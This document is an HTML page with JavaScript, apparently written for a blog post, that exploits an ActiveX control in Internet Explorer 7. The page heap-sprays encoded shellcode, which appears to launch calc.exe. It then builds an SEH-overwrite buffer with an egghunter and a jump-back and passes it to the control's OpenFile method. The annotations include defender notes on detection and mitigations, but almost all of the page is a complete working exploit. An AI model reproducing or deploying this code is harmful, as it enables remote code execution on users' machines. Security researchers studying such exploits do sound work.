Internet Explorer 7 RSP Exploit for blogpost
<!DOCTYPE html> | |
<html> | |
<head> | |
<title> Exploit for IE 7 </title> | |
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
// Heap spray: fills a JavaScript array with 500 copies of the same payload string.
// Each copy is prefixed with the egg tag twice, so the egghunter stub in the SEH
// chain below has something to locate once control is hijacked. Nothing is
// returned; the array is kept alive only through the global `myArray`-less scope
// of this call (the local is dropped on return, but the strings stay resident
// until the collector runs — which is what the spray relies on).
function allocateShellcode(){ | |
// Egg tag searched for by the egghunter (two %u-encoded 16-bit units).
var eggTag = "%u3077%u7430"; | |
// Payload body, %u-encoded so unescape() yields raw 16-bit units.
var msfShellcode = "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100"; | |
// Tag is doubled before the body; missing semicolon relies on ASI.
var shellcode = unescape(eggTag + eggTag + msfShellcode) | |
var myArray = []; | |
// `x` is never declared, so it leaks into the global scope and is shared with
// the loops in the top-level script below.
for (x = 0; x < 500; x++){ | |
myArray[x] = shellcode; | |
} | |
} | |
// Top-level script: builds the oversized string `crash` and hands it to the
// ActiveX control's OpenFile method (object id VULNERABLE, CLSID in <head>).
// Layout, per the constants below: NOP sled + egghunter padded to junk_size,
// then a 4-byte nSEH and 4-byte SEH overwrite, 10 NOPs, a 5-byte jump back,
// and 0x44 filler up to `size` bytes total.
// Defender notes: the SEH handler address and every offset are hard-coded, so
// the page only works against one specific module/version layout; SafeSEH,
// DEP and ASLR all break this pattern. For detection, the combination of an
// <object> instantiated by this CLSID and an OpenFile() call with a ~1000-byte
// argument is the observable trigger.
var crash = ""; | |
// Both assigned without `var` — implicit globals.
junk_size = 644; | |
size = 1000; | |
// Egghunter stub, byte-encoded with single-byte %xx escapes (not %uxxxx),
// so unescape() yields one byte per escape here.
var eggHunter = unescape( | |
"%54%5a%d9%eb%d9%72%f4%5f%57%59%49%49%49%49%49" + | |
"%49%49%49%49%49%43%43%43%43%43%43%37%51%5a%6a" + | |
"%41%58%50%30%41%30%41%6b%41%41%51%32%41%42%32" + | |
"%42%42%30%42%42%41%42%58%50%38%41%42%75%4a%49" + | |
"%62%46%4e%61%6b%7a%6b%4f%64%4f%30%42%32%72%43" + | |
"%5a%44%42%42%78%68%4d%56%4e%37%4c%57%75%61%4a" + | |
"%44%34%78%6f%48%38%74%37%74%70%34%70%72%54%6f" + | |
"%79%5a%77%6e%4f%53%45%6a%4a%6e%4f%61%65%4a%47" + | |
"%69%6f%68%67%41%41" | |
); | |
// Pad with 0x90 so that sled + egghunter together occupy exactly junk_size bytes.
for(x=0;x<junk_size-eggHunter.length;x++){ | |
crash += unescape("%90"); | |
} | |
crash += eggHunter; | |
// SEH record overwrite: next-SEH pointer then handler pointer, 4 bytes each.
// The handler address is a fixed absolute value, i.e. no ASLR is assumed.
nSEH = '%90%90%EB%07'; // JMP SHORT | |
SEH = '%35%60%6D%74'; // 746D6035 pop pop ret address | |
jmpBack = '%E9%37%FF%FF%FF'; // JMP Back to the egghunter | |
crash += unescape(nSEH); | |
crash += unescape(SEH); | |
for(x=0;x<10;x++){ | |
crash += unescape("%90");//Print 10 NOPs | |
} | |
crash += unescape(jmpBack); | |
// Fill the remainder with 0x44 to reach `size`. Note jmpBack.length is the
// length of the *escaped* string (20 chars), not the 5 decoded bytes, so the
// final buffer is shorter than `size` by 15 bytes — presumably tolerated by
// the target, but worth knowing when reading the offsets above.
for(x=0;x<size - junk_size - 4 - 4 - jmpBack.length - 10;x++){ | |
crash += unescape("%44"); | |
} | |
// Spray first, then trigger the overflow via the control's OpenFile method.
allocateShellcode(); | |
VULNERABLE.OpenFile(crash); | |
</script> | |
</body> | |
</html> |